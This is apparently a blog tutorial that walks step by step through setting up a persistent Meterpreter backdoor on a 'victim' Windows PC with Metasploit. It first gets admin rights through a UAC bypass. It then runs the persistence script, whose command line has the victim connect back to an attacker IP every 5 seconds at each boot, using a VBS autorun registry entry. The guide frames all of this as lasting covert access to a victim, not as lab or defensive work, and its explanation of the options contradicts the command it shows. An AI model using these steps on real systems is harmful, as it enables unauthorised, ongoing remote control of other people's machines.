Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.
The answer is "Yes!" ? How ?Lets know !
Persistent creates a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on.
You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood Persistent creates a vbs script on the victim system and it to appropriate registry to autorun.
To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC.
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 : Firtly get a meterpreter of victim PC and a get a admim privilege of vitim pc using bypassuac
How To Bypass UAC And Get Admin Privilege in Windows Using MetaSploit.
Step 2 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information
Step 3 : Just Type help to see more action.
Step 4 : Type Exit and Run the Persistence Script
Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victims system. First lets take a look at the options that are available when we run this script by using the –h switch
meterpreter > run persistence -h
Step 5 : Type Command
meterpreter >run persistence -U -i 5 -p 4466 -r 192.168.18.132
This command then will run the persistence and checks every 5 seconds for a connection (-i 30), connects on port 4466 (-p 4466), and connects to the local system (ours) on IP address 192.168.18.132.
The .vbs file sucessfully saved on victim PC.Opening a Second Session We can see that we have opened a Meterpreter session on the victim system.
Step 6 : Now its time to check if the backdoor will open for us a new session every time that the system will boot. So we will reboot the system.
Windows is shutting down
See all sessions automatically closed.
Step 7 : Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 5 seconds until it has successfully open a session for us.
Step 8 : Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again.
Step 9 : Now check open Sessions